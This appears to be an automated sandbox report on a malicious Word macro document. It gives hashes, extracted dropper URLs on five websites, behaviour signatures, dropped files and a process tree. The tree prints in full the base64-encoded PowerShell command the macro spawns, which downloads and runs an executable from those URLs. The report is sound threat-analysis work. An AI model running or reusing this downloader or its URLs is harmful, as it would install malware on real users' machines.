Analysis

  • max time kernel
    122s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    13-06-2024 23:32

General

  • Target

    a71e4a779943aaa028af9996b614d9d9_JaffaCakes118.doc

  • Size

    131KB

  • MD5

    a71e4a779943aaa028af9996b614d9d9

  • SHA1

    da8b16fa034801d3eb11fb92741cb3bdfa63b608

  • SHA256

    4121261a90ceec70d342e21f322d96ec9ef7c64c06534c2dcc2f2ec69ed9bf8e

  • SHA512

    17b3f638920ab70e825cdbfac8b4ea1d995ff6a741ddf69027df2e55e0e3a4b077760048f9aa89c7a108142a7a214725fe73f111ecb88eb84fd13321ebdd2775

  • SSDEEP

    3072:H77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q7KO8owNx+EIyj:H77HUUUUUUUUUUUUUUUUUUUT52Vq8o4l

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://en.efesusstone.com/wp-content/uploads/EMBVtaupO/

exe.dropper

http://amazingtraps.com/wp-includes/KZYJuTjJp/

exe.dropper

http://bramastudio.com/wp-includes/mvBAPWMFc/

exe.dropper

http://revistadaybynight.com.br/sac/i2ofs9_mpi8a73dgz-4/

exe.dropper

http://boss-mobile.co.uk/wp-content/u6cyu6_m3atjj2-51/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a71e4a779943aaa028af9996b614d9d9_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2252
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -nop -e JABiAEEAegBXADAAegA5AEIAPQAnAEIATAB3AEsAUABCAGsAaAAnADsAJAB3AE0AdgBHAEMAagAgAD0AIAAnADEANgAyACcAOwAkAEQAYQBxAGkAdAAyAGgAUgA9ACcAWQB1ADAAVgBHADgANgAnADsAJABPADcANgBCADYAbwBkAEEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHcATQB2AEcAQwBqACsAJwAuAGUAeABlACcAOwAkAEQANQBfAHEAOQBvAD0AJwB6AHQAaABmAFoAVwBHAGMAJwA7ACQASwBFAFQAagBCAFYAegAyAD0AJgAoACcAbgBlAHcAJwArACcALQAnACsAJwBvAGIAagBlACcAKwAnAGMAdAAnACkAIABOAEUAVAAuAFcAZQBiAEMATABgAEkARQBgAE4AdAA7ACQARABuAHMANABxAFQAPQAnAGgAdAB0AHAAOgAvAC8AZQBuAC4AZQBmAGUAcwB1AHMAcwB0AG8AbgBlAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvAEUATQBCAFYAdABhAHUAcABPAC8AQABoAHQAdABwADoALwAvAGEAbQBhAHoAaQBuAGcAdAByAGEAcABzAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBLAFoAWQBKAHUAVABqAEoAcAAvAEAAaAB0AHQAcAA6AC8ALwBiAHIAYQBtAGEAcwB0AHUAZABpAG8ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAG0AdgBCAEEAUABXAE0ARgBjAC8AQABoAHQAdABwADoALwAvAHIAZQB2AGkAcwB0AGEAZABhAHkAYgB5AG4AaQBnAGgAdAAuAGMAbwBtAC4AYgByAC8AcwBhAGMALwBpADIAbwBmAHMAOQBfAG0AcABpADgAYQA3ADMAZABnAHoALQA0AC8AQABoAHQAdABwADoALwAvAGIAbwBzAHMALQBtAG8AYgBpAGwAZQAuAGMAbwAuAHUAawAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1ADYAYwB5AHUANgBfAG0AMwBhAHQAagBqADIALQA1ADEALwAnAC4AcwBwAEwAaQB0ACgAJwBAACcAKQA7ACQAdABRADAAYQB1AGgAPQAnAFgAegB6AEoARQBxAGsAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGwAQgBQAFoAQgBJAHoAMwAgAGkAbgAgACQARABuAHMANABxAFQAKQB7AHQAcgB5AHsAJABLAEUAVABqAEIAVgB6ADIALgBEAE8AVwBuAGwATwBBAGQAZgBpAGwARQAoACQAbABCAFAAWgBCAEkAegAzACwAIAAkAE8ANwA2AEIANgBvAGQAQQApADsAJABxAEUAdQB0ADIASwBEAGsAPQAnAHMARABYADQANABmAHcAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABPADcANgBCADYAbwBkAEEAKQAuAGwARQBuAEcAdABoACAALQBnAGUAIAAyADAANwAwADEAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AHMAVABBAFIAdAAoACQATwA3ADYAQgA2AG8AZABBACkAOwAkAGgASgBkAFAAWQBMAD0AJwBwAHAAMgA2AFYAWQBSAFgAJwA7AGIAcgBlAGEAawA7ACQAQgBHADcAMgBNADcAagA9ACcAdgA3AG8AUQBvADUAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAaQBtAGYAVQBwAGEAPQAnAHUAdgA4AHMAMABtAGoAbwAnAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1628

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3D56BFB6.wmf

      Filesize

      700B

      MD5

      3a257837b942678196c5aea8272aae07

      SHA1

      0cf02ec5be2ea25fa69df1ae0b96ccd90adb253e

      SHA256

      3772a992482091e4d612e2dcda785722ba5c4d010df6bb2abbe03ce505a5b3f1

      SHA512

      5fbf2bd6f2bc4f10c854775350e5d5921dc9a5ea75fbb969f18ce5fa39b165b5700dc441b103e7274a5759413e6edbb20da81e35fbf147b5978311c852d2635e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E05E2D68.wmf

      Filesize

      700B

      MD5

      61a2105e5afbf4035dc75bb5cadcb16a

      SHA1

      b7ecd36fbf6c1c206c30cfca0fb3a62bf5934116

      SHA256

      ba54eb44f8eddf108456f6b8d3d53ff2753c36abf4444eec4ce0d1c91814845e

      SHA512

      ad8cab61bff9b9fdba1ecc7675803d189478a20536e10bc879978e8e959a7e6f77a787ddc63c3c33881d8dbd7e41b2aab483a9bed90d0f1fa0db4faa27c66251

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F5135D34.wmf

      Filesize

      700B

      MD5

      69952ac92961952331e52d29801f4cb0

      SHA1

      e2e9e3b3dc1f86e983d24fb1054420e93639f9d9

      SHA256

      8d48eb3838d179084dd6bf21eee61c665aa05d49b2c2e0d4600c700bea92203d

      SHA512

      bba8641d258439647d162a56cbc621d345e0e9ef777a7838bae35589eb90561c0f019fb45b250a8a0e3a7ec7f0ff1f37d8c817df2a8f239957c2b074907543f8

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      8dace97aa9a06d5b434b71028f40c4a7

      SHA1

      d420389658b5d047116e6bc51ff2c253fa134c18

      SHA256

      9317665d8cb2228cfd30bad41be699e6dea27db88c1573a2354b482c643a8cd9

      SHA512

      f87fee5a22792b2aa6c0711d20a53a348bed7719381ada9b7fd4e3aef9f4e59cb0ff46011a6b769bb3729e6f27c3c53d80bf547237c970c6350a9fdaef5c6bb8

    • memory/1628-48-0x0000000002420000-0x0000000002428000-memory.dmp

      Filesize

      32KB

    • memory/1628-47-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

      Filesize

      2.9MB

    • memory/2204-41-0x0000000005E20000-0x0000000005F20000-memory.dmp

      Filesize

      1024KB

    • memory/2204-38-0x0000000005E20000-0x0000000005F20000-memory.dmp

      Filesize

      1024KB

    • memory/2204-7-0x0000000006230000-0x0000000006330000-memory.dmp

      Filesize

      1024KB

    • memory/2204-40-0x0000000005E20000-0x0000000005F20000-memory.dmp

      Filesize

      1024KB

    • memory/2204-39-0x0000000005E20000-0x0000000005F20000-memory.dmp

      Filesize

      1024KB

    • memory/2204-2-0x00000000710BD000-0x00000000710C8000-memory.dmp

      Filesize

      44KB

    • memory/2204-0-0x000000002F111000-0x000000002F112000-memory.dmp

      Filesize

      4KB

    • memory/2204-59-0x00000000710BD000-0x00000000710C8000-memory.dmp

      Filesize

      44KB

    • memory/2204-60-0x0000000006230000-0x0000000006330000-memory.dmp

      Filesize

      1024KB

    • memory/2204-61-0x0000000005E20000-0x0000000005F20000-memory.dmp

      Filesize

      1024KB

    • memory/2204-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2204-77-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2204-90-0x00000000710BD000-0x00000000710C8000-memory.dmp

      Filesize

      44KB